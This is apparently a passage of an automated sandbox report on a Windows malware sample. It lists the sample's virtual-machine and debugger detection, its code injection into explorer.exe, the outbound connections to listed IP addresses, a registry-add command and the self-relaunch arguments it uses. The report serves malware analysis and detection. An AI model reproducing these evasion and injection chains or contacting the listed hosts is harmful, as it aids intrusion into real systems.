Source: explorer.exe, 00000002.00000000.2047025434.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware,p
Source: explorer.exe, 0000001E.00000002.3258962689.0000000004F8C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}dll
Source: explorer.exe, 0000001E.00000003.3004817424.00000000083C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3009500853.00000000083C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.3263362552.00000000083C3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3013299726.00000000083C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3014031027.00000000083C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWystem32\DriverStore\en-GB\msmouse.inf_loc
Source: explorer.exe, 00000002.00000000.2049221866.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: explorer.exe, 00000002.00000000.2046328419.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000002.00000000.2049221866.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.2047730753.000000000769A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001E.00000003.2977915464.0000000007BB5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}22658-3\

Source: C:\Users\user\AppData\Local\Temp\33A3.exe

API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\XVM5nluelx.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\XVM5nluelx.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\XVM5nluelx.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dejcbcc	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dejcbcc	System information queried: CodeIntegrityInformation

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\XVM5nluelx.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dejcbcc	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dejcbcc	Process queried: DebugPort

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\AppData\Local\Temp\33A3.exe

Code function: 8_2_02FC871C rdtsc

8_2_02FC871C

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\AppData\Local\Temp\33A3.exe

Code function: 9_2_00424168 _memset,IsDebuggerPresent,

9_2_00424168

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Users\user\AppData\Local\Temp\33A3.exe

Code function: 9_2_0042A57A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

9_2_0042A57A

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\33A3.exe

9_2_00412220

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_02E20D90 mov eax, dword ptr fs:[00000030h]	0_2_02E20D90
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_02E2092B mov eax, dword ptr fs:[00000030h]	0_2_02E2092B
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Code function: 0_2_02ED1D00 push dword ptr fs:[00000030h]	0_2_02ED1D00
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_02E20D90 mov eax, dword ptr fs:[00000030h]	4_2_02E20D90
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_02E2092B mov eax, dword ptr fs:[00000030h]	4_2_02E2092B
Source: C:\Users\user\AppData\Roaming\dejcbcc	Code function: 4_2_02E91670 push dword ptr fs:[00000030h]	4_2_02E91670
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_02FC70A3 push dword ptr fs:[00000030h]	8_2_02FC70A3
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 8_2_04A00042 push dword ptr fs:[00000030h]	8_2_04A00042
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_02EB70A3 push dword ptr fs:[00000030h]	13_2_02EB70A3
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 13_2_04A40042 push dword ptr fs:[00000030h]	13_2_04A40042

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\AppData\Local\Temp\33A3.exe

Code function: 9_2_004278D5 GetProcessHeap,

9_2_004278D5

Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_004329EC
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 9_2_004329BB SetUnhandledExceptionFilter,	9_2_004329BB
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_004329EC
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: 14_2_004329BB SetUnhandledExceptionFilter,	14_2_004329BB

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: dejcbcc.2.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 103.174.152.66 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 193.233.132.167 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 91.92.253.69 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.154.13.143 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 192.185.16.114 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 162.159.129.233 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 158.160.165.129 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.196.109.209 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 189.195.132.134 80	Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\33A3.exe

Code function: 8_2_04A00110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,

8_2_04A00110

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\XVM5nluelx.exe	Thread created: C:\Windows\explorer.exe EIP: 30019A0			Jump to behavior
Source: C:\Users\user\AppData\Roaming\dejcbcc	Thread created: unknown EIP: 32019A0			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Memory written: C:\Users\user\AppData\Local\Temp\33A3.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Memory written: C:\Users\user\AppData\Local\Temp\33A3.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Memory written: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Memory written: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Memory written: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe base: 400000 value starts with: 4D5A

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\XVM5nluelx.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dejcbcc	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dejcbcc	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Contains functionality to launch a program with higher privileges

Source: C:\Users\user\AppData\Local\Temp\33A3.exe

Code function: 9_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,

9_2_00419F90

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Process created: C:\Users\user\AppData\Local\Temp\33A3.exe C:\Users\user\AppData\Local\Temp\33A3.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Process created: C:\Users\user\AppData\Local\Temp\33A3.exe "C:\Users\user\AppData\Local\Temp\33A3.exe" --Admin IsNotAutoStart IsNotTask	Jump to behavior
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Process created: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe --Task	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Process created: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe "C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe" --AutoStart
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Process created: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe "C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe" --AutoStart

Source: explorer.exe, 00000002.00000000.2049221866.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd=
Source: explorer.exe, 00000002.00000000.2046688951.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000002.00000000.2046688951.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2047599413.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.3260994342.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.2046688951.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001E.00000002.3261048206.0000000007AC0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.3260994342.0000000004FD0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000001E.00000002.3258962689.0000000004F8C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd.J
Source: explorer.exe, 0000001E.00000002.3251223518.0000000001020000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 0Progman
Source: explorer.exe, 00000002.00000000.2046688951.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.2046328419.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PProgman

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\AppData\Local\Temp\33A3.exe

Code function: 8_2_04A280F6 cpuid

8_2_04A280F6

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	8_2_04A33F87
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,	8_2_04A2C8B7
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,	8_2_04A349EA
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,	8_2_04A3394D
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	8_2_04A40AB6
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,	9_2_0043404A
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,	9_2_00438178
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	9_2_00440116
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	9_2_004382A2
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	9_2_0043834F
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,	9_2_00438423
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: EnumSystemLocalesW,	9_2_004387C8
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: GetLocaleInfoW,	9_2_0043884E
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,	9_2_00432B6D
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,	9_2_00432FAD
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	9_2_004335E7
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,	9_2_00437BB3
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: EnumSystemLocalesW,	9_2_00437E27
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	9_2_00437E83
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	9_2_00437F00
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,	9_2_0042BF17
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,	9_2_00437F83
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	13_2_04A73F87
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,	13_2_04A6C8B7
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,	13_2_04A749EA
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,	13_2_04A7394D
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	13_2_04A80AB6
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,	14_2_0043404A
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,	14_2_00438178
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	14_2_00440116
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	14_2_004382A2
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	14_2_0043834F
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,	14_2_00438423
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: EnumSystemLocalesW,	14_2_004387C8
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: GetLocaleInfoW,	14_2_0043884E
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,	14_2_00432B6D
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,	14_2_00432FAD
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___ge